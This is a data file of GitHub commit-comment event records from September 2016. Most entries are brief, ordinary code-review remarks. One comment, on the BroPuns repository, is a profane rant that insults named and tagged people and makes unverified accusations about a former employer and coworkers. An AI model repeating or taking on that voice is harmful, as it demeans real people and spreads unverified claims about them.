{"id":"4622306959","type":"CommitCommentEvent","actor":{"login":"Minimata"},"repo":{"name":"Minimata/WebGl"},"payload":{"comment":{"id":19185983,"position":36,"line":118,"path":"squelette/jsExos/ALEX_CH04.js","commit_id":"99f70520a9610459e3e74590a12fd523a0a07952","created_at":"2016-09-27T06:57:21Z","updated_at":"2016-09-27T06:57:21Z","body":"Will change it.\r\n\r\nHaving a custom framerate is goddamn difficult in comparison with setInterval though.\r\n[This](http://stackoverflow.com/questions/19764018/controlling-fps-with-requestanimationframe) pretty sums up what I've seen.\r\nHaving a simpler way to set the framerate would be nice instead of going through half of the JS features and 30 variables to set it correctly."}},"created_at":"2016-09-27T06:57:21Z"}
{"id":"4622310463","type":"CommitCommentEvent","actor":{"login":"goktugyil"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19185992,"position":118,"line":100,"path":"Sources/UIViewControllerExtensions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-27T06:58:20Z","updated_at":"2016-09-27T06:58:20Z","body":"i think these keyboard methods aren't as useful as I hoped. Do you guys use them? Maybe we should depreciate these?"}},"created_at":"2016-09-27T06:58:20Z"}
{"id":"4622310691","type":"CommitCommentEvent","actor":{"login":"aaime"},"repo":{"name":"geotools/geotools"},"payload":{"comment":{"id":19185994,"position":57,"line":57,"path":"modules/library/main/src/main/java/org/geotools/xml/NoExternalEntityResolver.java","commit_id":"c4bc0d489be8fb7f42150c94a2e4190945421e5d","created_at":"2016-09-27T06:58:24Z","updated_at":"2016-09-27T06:58:24Z","body":"As far as I can tell, something starting with \"http\" will also match something starting with \"https\""}},"created_at":"2016-09-27T06:58:24Z"}
{"id":"4622311774","type":"CommitCommentEvent","actor":{"login":"Tagliacollo"},"repo":{"name":"Tagliacollo/PartitionUCE"},"payload":{"comment":{"id":19185995,"position":null,"line":null,"path":null,"commit_id":"feb9200c04ee88ff276a7d773b575843e1819bbb","created_at":"2016-09-27T06:58:43Z","updated_at":"2016-09-27T06:58:43Z","body":"One more issue down! #9"}},"created_at":"2016-09-27T06:58:43Z"}
{"id":"4622312588","type":"CommitCommentEvent","actor":{"login":"vinpez"},"repo":{"name":"hanoiiot/hanoi-test"},"payload":{"comment":{"id":19185996,"position":null,"line":null,"path":null,"commit_id":"1443e827dc76aecc3e772539042081c757ee2b2a","created_at":"2016-09-27T06:58:57Z","updated_at":"2016-09-27T06:58:57Z","body":"oh yeah, definitely. absolutely. I am right now just trying to reduce variables and do things in obvious ways."}},"created_at":"2016-09-27T06:58:57Z"}
{"id":"4622312669","type":"CommitCommentEvent","actor":{"login":"Valeria450501"},"repo":{"name":"MarinaTitova/carsConfigurator"},"payload":{"comment":{"id":19185997,"position":null,"line":null,"path":null,"commit_id":"c447630f1d20e587e0e0bcbaa73837516e093cd4","created_at":"2016-09-27T06:58:58Z","updated_at":"2016-09-27T06:58:58Z","body":"Было бы хорошо, если у тебя появится поиск по базе данных."}},"created_at":"2016-09-27T06:58:58Z"}
{"id":"4622312780","type":"CommitCommentEvent","actor":{"login":"wooorm"},"repo":{"name":"strugee/remark-rewrite-headers"},"payload":{"comment":{"id":19185998,"position":5,"line":23,"path":"index.js","commit_id":"1916a393626a372b518fc790a2229827701db676","created_at":"2016-09-27T06:59:00Z","updated_at":"2016-09-27T06:59:00Z","body":"👌"}},"created_at":"2016-09-27T06:59:00Z"}
{"id":"4622313871","type":"CommitCommentEvent","actor":{"login":"aaime"},"repo":{"name":"geotools/geotools"},"payload":{"comment":{"id":19186000,"position":58,"line":58,"path":"modules/library/main/src/main/java/org/geotools/xml/NoExternalEntityResolver.java","commit_id":"c4bc0d489be8fb7f42150c94a2e4190945421e5d","created_at":"2016-09-27T06:59:19Z","updated_at":"2016-09-27T06:59:19Z","body":"This class has been backported from GeoServer, where it is thoroughly tested. If you believe this won't work in wfs-ng please provide some evidence :-)"}},"created_at":"2016-09-27T06:59:19Z"}
{"id":"4622315953","type":"CommitCommentEvent","actor":{"login":"trotzig"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19186006,"position":42,"line":37,"path":"js/src/workers/ComputeAndInjectDiffsWorker.js","commit_id":"35b44f1941fdfb63681a1088982a4cac4b571215","created_at":"2016-09-27T06:59:54Z","updated_at":"2016-09-27T06:59:54Z","body":"Done. "}},"created_at":"2016-09-27T06:59:54Z"}
{"id":"4622319229","type":"CommitCommentEvent","actor":{"login":"vvs-"},"repo":{"name":"opentomb/OpenTomb"},"payload":{"comment":{"id":19186025,"position":null,"line":null,"path":null,"commit_id":"8d44a30b433706b1f753057e7cd2db75269a3fae","created_at":"2016-09-27T07:00:44Z","updated_at":"2016-09-27T07:00:44Z","body":"Actually, I tested it and the problem lies in the previous commit. So, I doubt that it's a rounding error. It looks like there is no ambient light at all now."}},"created_at":"2016-09-27T07:00:44Z"}
{"id":"4622319500","type":"CommitCommentEvent","actor":{"login":"trotzig"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19186026,"position":39,"line":34,"path":"js/src/workers/ComputeAndInjectDiffsWorker.js","commit_id":"35b44f1941fdfb63681a1088982a4cac4b571215","created_at":"2016-09-27T07:00:48Z","updated_at":"2016-09-27T07:00:48Z","body":"I guess. :)"}},"created_at":"2016-09-27T07:00:48Z"}
{"id":"4622319775","type":"CommitCommentEvent","actor":{"login":"aaime"},"repo":{"name":"geotools/geotools"},"payload":{"comment":{"id":19186028,"position":37,"line":37,"path":"modules/library/main/src/main/java/org/geotools/xml/NoExternalEntityResolver.java","commit_id":"c4bc0d489be8fb7f42150c94a2e4190945421e5d","created_at":"2016-09-27T07:00:53Z","updated_at":"2016-09-27T07:00:53Z","body":"What additional resolution method? This class is used in GeoServer in combination with Parser with successes (many tests showing it works)."}},"created_at":"2016-09-27T07:00:53Z"}
{"id":"4622321138","type":"CommitCommentEvent","actor":{"login":"trotzig"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19186033,"position":53,"line":53,"path":"js/src/alignArrays.js","commit_id":"35b44f1941fdfb63681a1088982a4cac4b571215","created_at":"2016-09-27T07:01:14Z","updated_at":"2016-09-27T07:01:14Z","body":"Yeah! I was looking for something like this! Will do."}},"created_at":"2016-09-27T07:01:14Z"}
{"id":"4622321866","type":"CommitCommentEvent","actor":{"login":"moonou"},"repo":{"name":"moonou/webpack"},"payload":{"comment":{"id":19186035,"position":6,"line":19,"path":"template/build/webpack.base.conf.js","commit_id":"1270ea5269d72f20c0809a1d3e681b8924566a94","created_at":"2016-09-27T07:01:25Z","updated_at":"2016-09-27T07:01:25Z","body":"Why do you insert '∞'  there?"}},"created_at":"2016-09-27T07:01:25Z"}
{"id":"4622324419","type":"CommitCommentEvent","actor":{"login":"MarinaTitova"},"repo":{"name":"Valeria450501/More-Movies"},"payload":{"comment":{"id":19186042,"position":null,"line":null,"path":null,"commit_id":"a3a2ce8a6a4d190f44e60d76650e2bcf7bfa1a73","created_at":"2016-09-27T07:02:11Z","updated_at":"2016-09-27T07:02:11Z","body":"Can you add names to the tabs? Application would be more useful for users :)"}},"created_at":"2016-09-27T07:02:11Z"}
{"id":"4622324546","type":"CommitCommentEvent","actor":{"login":"shanept"},"repo":{"name":"AceIDE/editor"},"payload":{"comment":{"id":19186043,"position":null,"line":null,"path":null,"commit_id":"bd478ac353fdef79b7add9495d54fb016b8fe9ce","created_at":"2016-09-27T07:02:13Z","updated_at":"2016-09-27T07:02:13Z","body":"Fixes issue #2 "}},"created_at":"2016-09-27T07:02:13Z"}
{"id":"4622325010","type":"CommitCommentEvent","actor":{"login":"wooorm"},"repo":{"name":"strugee/remark-rewrite-headers"},"payload":{"comment":{"id":19186047,"position":7,"line":25,"path":"package.json","commit_id":"93a1bb0a925de436d48d57f4289f419d27b02a3b","created_at":"2016-09-27T07:02:21Z","updated_at":"2016-09-27T07:02:21Z","body":"There was an automated tweet sent out (by npm daily), matching search criteria I check once in a while!"}},"created_at":"2016-09-27T07:02:21Z"}
{"id":"4622327444","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"karelzak/util-linux"},"payload":{"comment":{"id":19186049,"position":145,"line":374,"path":"libsmartcols/src/column.c","commit_id":"949ea05f1af647834db24b9172ac006488d2e4f4","created_at":"2016-09-27T07:03:04Z","updated_at":"2016-09-27T07:03:04Z","body":"it's not anymore `const` then. There should be `free()` and then `strdup()`"}},"created_at":"2016-09-27T07:03:04Z"}
{"id":"4622327504","type":"CommitCommentEvent","actor":{"login":"trotzig"},"repo":{"name":"Galooshi/happo"},"payload":{"comment":{"id":19186050,"position":13,"line":13,"path":"js/src/alignArrays.js","commit_id":"35b44f1941fdfb63681a1088982a4cac4b571215","created_at":"2016-09-27T07:03:05Z","updated_at":"2016-09-27T07:03:05Z","body":"I went with fill for placeholders, but I'm leaving this alone for now."}},"created_at":"2016-09-27T07:03:05Z"}
{"id":"4622327518","type":"CommitCommentEvent","actor":{"login":"piv199"},"repo":{"name":"goktugyil/EZSwiftExtensions"},"payload":{"comment":{"id":19186051,"position":118,"line":100,"path":"Sources/UIViewControllerExtensions.swift","commit_id":"201850843fe4486b45bb0ac715f9a3fa2eb18e95","created_at":"2016-09-27T07:03:05Z","updated_at":"2016-09-27T07:03:05Z","body":"Well, I try to use these methods, but sometimes I forgot and create them by myself..."}},"created_at":"2016-09-27T07:03:05Z"}
{"id":"4622328499","type":"CommitCommentEvent","actor":{"login":"moonou"},"repo":{"name":"vuejs-templates/webpack"},"payload":{"comment":{"id":19186056,"position":6,"line":19,"path":"template/build/webpack.base.conf.js","commit_id":"1270ea5269d72f20c0809a1d3e681b8924566a94","created_at":"2016-09-27T07:03:22Z","updated_at":"2016-09-27T07:03:22Z","body":"Why do you insert '∞' there?"}},"created_at":"2016-09-27T07:03:22Z"}
{"id":"4622329251","type":"CommitCommentEvent","actor":{"login":"mhavard999"},"repo":{"name":"mhavard999/BroPuns"},"payload":{"comment":{"id":19186060,"position":null,"line":null,"path":null,"commit_id":"efb11a636340178e8d416c8880d7ef9fd324f8bd","created_at":"2016-09-27T07:03:32Z","updated_at":"2016-09-27T07:03:32Z","body":"omg! :heart: :heart: :heart: :heart: :heart: :heart: :heart: \r\n\r\n@dpinney i just got fired from another job for being crazy!  but this time it was a lot more intentional - i worked at a fucking SEO firm for almost 2 years.  it probably was just god or linus trying to help me find a more moral path in life.\r\n\r\ncheck it out, i went out with a bang!\r\n\r\nomg @senderle  check this out too, shawn always talked poorly about you behind your back, and it fucking disgusted me because it was all this childish shit about you being a nerd and him being 2cool4u.\r\n\r\nomg @senderle so last week, i go up to brooklyn, i'm walking with ryan - who i've come to regard as THE most boring, pretentious person I've ever met in my life, like literally talentless - just a salesguy at an seo firm, but anyway, we were walking and ryan decides some random girl's skirt is too short and says \"is she trying to sell herself?\" and like in a way that he expected me to chime in and literally slut shame a girl for no other reason than her dress not being to his whitey dudebro liking.\r\n\r\nhttps://www.youtube.com/watch?v=J21OpZiZlNg\r\n\r\nhe had his lawyer email me to fire me instead of giving me a fucking phone call.  the lawyer said something about a severance package in exchange for a peaceful parting of ways:\r\n\r\nhttps://www.youtube.com/watch?v=a0XjyBZnIxU\r\n\r\nwhat the fuck kind of name is idea evolver anyway, i never thought that name was good, just like shows what a bunch of unoriginal artless talentless dolts are running that place"}},"created_at":"2016-09-27T07:03:32Z"}
{"id":"4622329539","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"karelzak/util-linux"},"payload":{"comment":{"id":19186061,"position":157,"line":386,"path":"libsmartcols/src/column.c","commit_id":"949ea05f1af647834db24b9172ac006488d2e4f4","created_at":"2016-09-27T07:03:37Z","updated_at":"2016-09-27T07:03:37Z","body":"also it's not free'ed in `unref()`"}},"created_at":"2016-09-27T07:03:37Z"}
{"id":"4622331031","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"karelzak/util-linux"},"payload":{"comment":{"id":19186065,"position":37,"line":249,"path":"libsmartcols/src/column.c","commit_id":"949ea05f1af647834db24b9172ac006488d2e4f4","created_at":"2016-09-27T07:04:03Z","updated_at":"2016-09-27T07:04:03Z","body":"`build-in` -> `built-in`"}},"created_at":"2016-09-27T07:04:03Z"}
{"id":"4622331420","type":"CommitCommentEvent","actor":{"login":"Valeria450501"},"repo":{"name":"Valeria450501/More-Movies"},"payload":{"comment":{"id":19186067,"position":null,"line":null,"path":null,"commit_id":"a3a2ce8a6a4d190f44e60d76650e2bcf7bfa1a73","created_at":"2016-09-27T07:04:09Z","updated_at":"2016-09-27T07:04:09Z","body":"Yes, it can be added to the search bar. Thanks for the advice."}},"created_at":"2016-09-27T07:04:09Z"}
{"id":"4622332825","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"karelzak/util-linux"},"payload":{"comment":{"id":19186068,"position":18,"line":179,"path":"libsmartcols/src/column.c","commit_id":"949ea05f1af647834db24b9172ac006488d2e4f4","created_at":"2016-09-27T07:04:35Z","updated_at":"2016-09-27T07:04:35Z","body":"`const struct libscols_column *cl`"}},"created_at":"2016-09-27T07:04:35Z"}
{"id":"4622335516","type":"CommitCommentEvent","actor":{"login":"MarinaTitova"},"repo":{"name":"MarinaTitova/carsConfigurator"},"payload":{"comment":{"id":19186075,"position":null,"line":null,"path":null,"commit_id":"c447630f1d20e587e0e0bcbaa73837516e093cd4","created_at":"2016-09-27T07:05:22Z","updated_at":"2016-09-27T07:05:22Z","body":"It's nice idea, thank you) noted"}},"created_at":"2016-09-27T07:05:22Z"}
{"id":"4622337140","type":"CommitCommentEvent","actor":{"login":"Nograsby"},"repo":{"name":"Nograsby/Test"},"payload":{"comment":{"id":19186079,"position":3,"line":1,"path":"README.md","commit_id":"f58c7005e41b520624d092273d72bf5489b5cebc","created_at":"2016-09-27T07:05:49Z","updated_at":"2016-09-27T07:05:49Z","body":"check why"}},"created_at":"2016-09-27T07:05:49Z"}
{"id":"4622337275","type":"CommitCommentEvent","actor":{"login":"warmhug"},"repo":{"name":"ant-design/ant-design-mobile"},"payload":{"comment":{"id":19186080,"position":null,"line":null,"path":null,"commit_id":"5e7bb5c9ea86caf350d9f580bea3276be9431f05","created_at":"2016-09-27T07:05:51Z","updated_at":"2016-09-27T07:05:51Z","body":"fixed"}},"created_at":"2016-09-27T07:05:51Z"}
{"id":"4622337654","type":"CommitCommentEvent","actor":{"login":"harisheidiko"},"repo":{"name":"mule123/aa"},"payload":{"comment":{"id":19186081,"position":null,"line":null,"path":null,"commit_id":"fc7c3def17f386e883fe18a47cb3da17fdf10f27","created_at":"2016-09-27T07:05:57Z","updated_at":"2016-09-27T07:05:57Z","body":"Github Testing "}},"created_at":"2016-09-27T07:05:57Z"}
{"id":"4622338318","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":19186084,"position":14,"line":0,"path":"HelloWorld/Miscellaneous/MemoryModel2.cs","commit_id":"807f008e39f64d052aa59524fe846905bf91a9f5","created_at":"2016-09-27T07:06:08Z","updated_at":"2016-09-27T07:06:08Z","body":"Лучше подойдет именнование AssignUInt8Var, а для старой команды AssignUInt8Const"}},"created_at":"2016-09-27T07:06:08Z"}
{"id":"4622339509","type":"CommitCommentEvent","actor":{"login":"y8n"},"repo":{"name":"xgfe/ui-xg"},"payload":{"comment":{"id":19186088,"position":null,"line":null,"path":null,"commit_id":"1338d314de6682e7a010503a3766f6e5473d88eb","created_at":"2016-09-27T07:06:27Z","updated_at":"2016-09-27T07:06:27Z","body":"add uixConfirm"}},"created_at":"2016-09-27T07:06:27Z"}
{"id":"4622344445","type":"CommitCommentEvent","actor":{"login":"rebroad"},"repo":{"name":"zander/raspberrypifullnode"},"payload":{"comment":{"id":19186111,"position":null,"line":null,"path":null,"commit_id":"2e0283cce6c0924ada9cea2c77c62d9ae96bdb00","created_at":"2016-09-27T07:07:52Z","updated_at":"2016-09-27T07:07:52Z","body":"@zander I'd like to compile bitcoin classic with some modifications for testing on the Pi... May I ask how you are currently compiling it for the raspberry? I have heard the best way is to use qemu on a PC, but it would save me a lot of work if someone else has already done the leg work! Thanks if you can help!"}},"created_at":"2016-09-27T07:07:52Z"}
{"id":"4622345909","type":"CommitCommentEvent","actor":{"login":"wooorm"},"repo":{"name":"strugee/remark-rewrite-headers"},"payload":{"comment":{"id":19186115,"position":13,"line":13,"path":"README.md","commit_id":"5faed606cea9d2e700de6dcab68dcbd49228babc","created_at":"2016-09-27T07:08:17Z","updated_at":"2016-09-27T07:08:17Z","body":"Complete how? It's an unused dependency, and I can see scenarios without it."}},"created_at":"2016-09-27T07:08:17Z"}
{"id":"4622347588","type":"CommitCommentEvent","actor":{"login":"sc4ryb3ar"},"repo":{"name":"ChikaraOSP/manifest"},"payload":{"comment":{"id":19186118,"position":null,"line":null,"path":null,"commit_id":"71d5730c570976be38f684cd4acf0d21d69488d5","created_at":"2016-09-27T07:08:45Z","updated_at":"2016-09-27T07:08:45Z","body":"/fail"}},"created_at":"2016-09-27T07:08:45Z"}
{"id":"4622354828","type":"CommitCommentEvent","actor":{"login":"FauziAkram"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":19186141,"position":null,"line":null,"path":null,"commit_id":"b0cc696cf1a6b7b05cb823a9a6b23519059666f0","created_at":"2016-09-27T07:10:44Z","updated_at":"2016-09-27T07:10:44Z","body":"Hi Rocky,\r\n\r\nThank you fo your valuable feedback.\r\nCan you please explain to me in this line : \r\n{ S(0, 0), S(0, 25), S(40, 62), S(40, 59), S( 0, 34), S(35, 48) }\r\nWhat are the pieces taken into consideration for each pair of values ?\r\nI understand that (35,48) are for Queen piece.\r\nWhat about the rest before it?"}},"created_at":"2016-09-27T07:10:44Z"}
{"id":"4622355601","type":"CommitCommentEvent","actor":{"login":"JohnPaulHarold"},"repo":{"name":"alemangui/pizzicato"},"payload":{"comment":{"id":19186145,"position":null,"line":null,"path":null,"commit_id":"c1765054fb73daf30b348fb5c8c167ad91e11589","created_at":"2016-09-27T07:10:55Z","updated_at":"2016-09-27T07:10:55Z","body":"thanks for the post-merge fixes! \r\n\r\nI don't mind making these changes as part of the PR review process. I'd rather the PR went through as cleanly as possible, and it also gives me more of an idea of the 'house style'. Anyway, cool, I hope the effect gets some use."}},"created_at":"2016-09-27T07:10:55Z"}
{"id":"4622356958","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":19186155,"position":null,"line":null,"path":null,"commit_id":"8826f70faa6f8a36a81a7d95dcf0e3b669634433","created_at":"2016-09-27T07:11:15Z","updated_at":"2016-09-27T07:11:15Z","body":"Have you tried `% 16` instead of `/ 4`?  I'm mostly clueless about this code anyway!"}},"created_at":"2016-09-27T07:11:15Z"}
{"id":"4622361799","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"tobi5648/Exercises-Aggregation"},"payload":{"comment":{"id":19186165,"position":42,"line":42,"path":"Department/Department.cs","commit_id":"b671fdde91fdd1bf6d495eaf66f8de7b11e1ea84","created_at":"2016-09-27T07:12:36Z","updated_at":"2016-09-27T07:12:36Z","body":"Prøv at læse dokumentationen om både IreadOnlyList<T> og om polymorfi i typer. Kan det lade sig gøre at der ikke kan konverteres fra List<T> til IReadOnlyList<T>?"}},"created_at":"2016-09-27T07:12:36Z"}
{"id":"4622365540","type":"CommitCommentEvent","actor":{"login":"Mara-AspIT"},"repo":{"name":"tobi5648/Exercises-Aggregation"},"payload":{"comment":{"id":19186172,"position":66,"line":66,"path":"Department/Department.cs","commit_id":"b671fdde91fdd1bf6d495eaf66f8de7b11e1ea84","created_at":"2016-09-27T07:13:39Z","updated_at":"2016-09-27T07:13:39Z","body":"Anvend settere i stedet."}},"created_at":"2016-09-27T07:13:39Z"}
{"id":"4622365867","type":"CommitCommentEvent","actor":{"login":"dafoyiming"},"repo":{"name":"Lickkylee/azure-quickstart-templates"},"payload":{"comment":{"id":19186173,"position":null,"line":null,"path":null,"commit_id":"25868b27a2d644f6b51eed3b1443e6cf20b979d1","created_at":"2016-09-27T07:13:44Z","updated_at":"2016-09-27T07:13:44Z","body":"QI:\r\n\r\nThanks for your updating the template\r\n\r\nYiming:)\r\n"}},"created_at":"2016-09-27T07:13:44Z"}
{"id":"4622370431","type":"CommitCommentEvent","actor":{"login":"Rednol"},"repo":{"name":"Jvdveen92/Voortgangssysteem"},"payload":{"comment":{"id":19186182,"position":null,"line":null,"path":null,"commit_id":"b22e4c7b06f92dfb024e8cb22fda809cd80a51fb","created_at":"2016-09-27T07:14:58Z","updated_at":"2016-09-27T07:14:58Z","body":"Eerst in [localhost/phpmyadmin](http://localhost/phpmyadmin/) een auth database aanmaken vervolgs bestand importeren in die database"}},"created_at":"2016-09-27T07:14:58Z"}
{"id":"4622373569","type":"CommitCommentEvent","actor":{"login":"xingxueke"},"repo":{"name":"xingxueke/skPakTool"},"payload":{"comment":{"id":19186191,"position":null,"line":null,"path":null,"commit_id":"6d4b822f8b2494d342d66c6d4ac8c1de43d618fc","created_at":"2016-09-27T07:15:51Z","updated_at":"2016-09-27T07:15:51Z","body":"@benladen 这个能直接pack 回去的\r\nskpakTool p [生成的pak名字] [原来的pak] [解压pak时生成filename的txt文件]"}},"created_at":"2016-09-27T07:15:51Z"}
{"id":"4622374509","type":"CommitCommentEvent","actor":{"login":"gregquat"},"repo":{"name":"symfony-fr/symfony-docs-fr"},"payload":{"comment":{"id":19186193,"position":null,"line":null,"path":null,"commit_id":"a6fe5086b211bac4cc533cf8cdb53fdaf416f622","created_at":"2016-09-27T07:16:08Z","updated_at":"2016-09-27T07:16:08Z","body":":)\r\nC'est surtout que mes yeux saignaient..."}},"created_at":"2016-09-27T07:16:08Z"}
{"id":"4622376267","type":"CommitCommentEvent","actor":{"login":"jotsetung"},"repo":{"name":"lgatto/MSnbase"},"payload":{"comment":{"id":19186196,"position":null,"line":null,"path":null,"commit_id":"66b6c37c2b3ac21eedd2fca026570eda5d14e848","created_at":"2016-09-27T07:16:36Z","updated_at":"2016-09-27T07:16:36Z","body":"@lgatto sorry, did not realize I was pushing to master. Feel free to edit or even remove the comparison (specifically, since I didn't observe any performance difference)."}},"created_at":"2016-09-27T07:16:36Z"}
{"id":"4622380923","type":"CommitCommentEvent","actor":{"login":"rebroad"},"repo":{"name":"bitcoinclassic/bitcoinclassic"},"payload":{"comment":{"id":19186203,"position":24,"line":2388,"path":"src/main.cpp","commit_id":"f6e014f83ee8714ca169aee0bdbb48da6d162697","created_at":"2016-09-27T07:17:52Z","updated_at":"2016-09-27T07:17:52Z","body":"I think this code is useful, but perhaps the warning message could just be made more specific...?"}},"created_at":"2016-09-27T07:17:52Z"}
{"id":"4622380983","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19186205,"position":9,"line":9,"path":"backend/src/main/java/ru/avito/web/ServerResponse.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-27T07:17:53Z","updated_at":"2016-09-27T07:17:53Z","body":"Сейчас АПИ возвращает json объект, в поле result хранится строка, которая то же json объект. Так не должно быть, должен быть просто один json объект, а не json внутри со строкой json. ибо пздц"}},"created_at":"2016-09-27T07:17:53Z"}
{"id":"4622382907","type":"CommitCommentEvent","actor":{"login":"jrieken"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19186212,"position":10,"line":625,"path":"src/vs/vscode.d.ts","commit_id":"a8894fbf0edb35e3aab742b4c540b25c11ac60cc","created_at":"2016-09-27T07:18:24Z","updated_at":"2016-09-27T07:18:24Z","body":"@alexandrudima Unsure about the use of or-type here - mainly because of consistency (we have gone with enum everywhere else). What I wonder is if there will be more values for this in the future?"}},"created_at":"2016-09-27T07:18:24Z"}
{"id":"4622384602","type":"CommitCommentEvent","actor":{"login":"arekpalinski"},"repo":{"name":"ayende/ravendb"},"payload":{"comment":{"id":19186219,"position":22,"line":37,"path":"src/Sparrow/Json/ArenaMemoryAllocator.cs","commit_id":"6300e22069cf04a3c823135b3fac1b369d28687e","created_at":"2016-09-27T07:18:51Z","updated_at":"2016-09-27T07:18:51Z","body":"Could we use that and put Debug.Assert(ArenaMemoryAllocator.GlobalAllocations == 0) in RavenServer.Dispose ?"}},"created_at":"2016-09-27T07:18:51Z"}
{"id":"4622388298","type":"CommitCommentEvent","actor":{"login":"LinusBorg"},"repo":{"name":"vuejs-templates/webpack"},"payload":{"comment":{"id":19186232,"position":6,"line":19,"path":"template/build/webpack.base.conf.js","commit_id":"1270ea5269d72f20c0809a1d3e681b8924566a94","created_at":"2016-09-27T07:19:52Z","updated_at":"2016-09-27T07:19:52Z","body":"gootd question. probably some typo."}},"created_at":"2016-09-27T07:19:52Z"}
{"id":"4622393208","type":"CommitCommentEvent","actor":{"login":"liule1988"},"repo":{"name":"liule1988/blog"},"payload":{"comment":{"id":19186240,"position":null,"line":null,"path":null,"commit_id":"dc90d0353696cf79d0aed306a70e85fd10bb19be","created_at":"2016-09-27T07:21:11Z","updated_at":"2016-09-27T07:21:11Z","body":"第一步学习怎么用github"}},"created_at":"2016-09-27T07:21:11Z"}
{"id":"4622396433","type":"CommitCommentEvent","actor":{"login":"LinusBorg"},"repo":{"name":"vuejs-templates/webpack"},"payload":{"comment":{"id":19186248,"position":6,"line":19,"path":"template/build/webpack.base.conf.js","commit_id":"1270ea5269d72f20c0809a1d3e681b8924566a94","created_at":"2016-09-27T07:22:01Z","updated_at":"2016-09-27T07:22:01Z","body":"fixed it."}},"created_at":"2016-09-27T07:22:01Z"}
{"id":"4622405030","type":"CommitCommentEvent","actor":{"login":"ycheng-aa"},"repo":{"name":"product-definition-center/pdc-ruby-gem"},"payload":{"comment":{"id":19186264,"position":5,"line":69,"path":"lib/pdc/resource/identity.rb","commit_id":"136f1088c209dc320f2efe0864c6df30f3cd0dea","created_at":"2016-09-27T07:24:20Z","updated_at":"2016-09-27T07:24:20Z","body":"Should it use new site and api_root after PDC is reconfigured so url could be consistent with resource?"}},"created_at":"2016-09-27T07:24:20Z"}
{"id":"4622405685","type":"CommitCommentEvent","actor":{"login":"shonumi"},"repo":{"name":"shonumi/gbe-plus"},"payload":{"comment":{"id":19186265,"position":null,"line":null,"path":null,"commit_id":"c41ddaded0bc4bbd7514de2d8df58ccd0e6431e7","created_at":"2016-09-27T07:24:31Z","updated_at":"2016-09-27T07:24:31Z","body":"Also auto-append .bmp to every file dumped now."}},"created_at":"2016-09-27T07:24:31Z"}
{"id":"4622408487","type":"CommitCommentEvent","actor":{"login":"ustc-zzzz"},"repo":{"name":"Cat7373/Anti-AntiCheat-MOD"},"payload":{"comment":{"id":19186275,"position":2,"line":2,"path":"src_999.999.999/main/java/org/cat73/antianticheat/AntiAntiCheat.java","commit_id":"5b314cb3901552fe4dff38032b411f3c4a210c22","created_at":"2016-09-27T07:25:14Z","updated_at":"2016-09-27T07:25:14Z","body":"就这么点么。。。"}},"created_at":"2016-09-27T07:25:14Z"}
{"id":"4622423224","type":"CommitCommentEvent","actor":{"login":"xuedinge"},"repo":{"name":"xuedinge/vue"},"payload":{"comment":{"id":19186299,"position":20,"line":18,"path":"src/main.js","commit_id":"a5e27b1174e9196dcc9dbb0becc487275ea2e84c","created_at":"2016-09-27T07:29:02Z","updated_at":"2016-09-27T07:29:02Z","body":"为什么句首要用分号呢？\r\nASI。"}},"created_at":"2016-09-27T07:29:02Z"}
{"id":"4622424760","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19186301,"position":6,"line":518,"path":"cura/BuildVolume.py","commit_id":"8e07a94d685e7d155a63c740592a319a3da24729","created_at":"2016-09-27T07:29:23Z","updated_at":"2016-09-27T07:29:23Z","body":"Ugh. "}},"created_at":"2016-09-27T07:29:23Z"}
{"id":"4622427478","type":"CommitCommentEvent","actor":{"login":"runcom"},"repo":{"name":"kubernetes-incubator/cri-o"},"payload":{"comment":{"id":19186306,"position":null,"line":null,"path":null,"commit_id":"e1b8802848e60a6473b918eb64f25e9d8d907deb","created_at":"2016-09-27T07:30:06Z","updated_at":"2016-09-27T07:30:06Z","body":"This doesn't have a DCO :("}},"created_at":"2016-09-27T07:30:06Z"}
{"id":"4622431919","type":"CommitCommentEvent","actor":{"login":"Alucard24"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19186309,"position":null,"line":null,"path":null,"commit_id":"34f81a8c6361873dbf37a27bc7125673d4403dc0","created_at":"2016-09-27T07:31:10Z","updated_at":"2016-09-27T07:31:10Z","body":"I pushed them yesterday into my \"my-MM-v10c\" branch :)"}},"created_at":"2016-09-27T07:31:10Z"}
{"id":"4622432158","type":"CommitCommentEvent","actor":{"login":"alexandrudima"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19186310,"position":10,"line":625,"path":"src/vs/vscode.d.ts","commit_id":"a8894fbf0edb35e3aab742b4c540b25c11ac60cc","created_at":"2016-09-27T07:31:14Z","updated_at":"2016-09-27T07:31:14Z","body":"@jrieken I also thought line numbers can only be off or on for the past 5 years :). Didn't realize anyone would want anything else. I like the suggestion to go with an enum"}},"created_at":"2016-09-27T07:31:14Z"}
{"id":"4622435718","type":"CommitCommentEvent","actor":{"login":"ngaut"},"repo":{"name":"pingcap/tidb"},"payload":{"comment":{"id":19186315,"position":22,"line":57,"path":"store/tikv/gc_worker.go","commit_id":"6e0d5626a78d5c418df6d50ca0c18da7b6efb0b3","created_at":"2016-09-27T07:32:10Z","updated_at":"2016-09-27T07:32:10Z","body":"We should also add \"start time\""}},"created_at":"2016-09-27T07:32:10Z"}
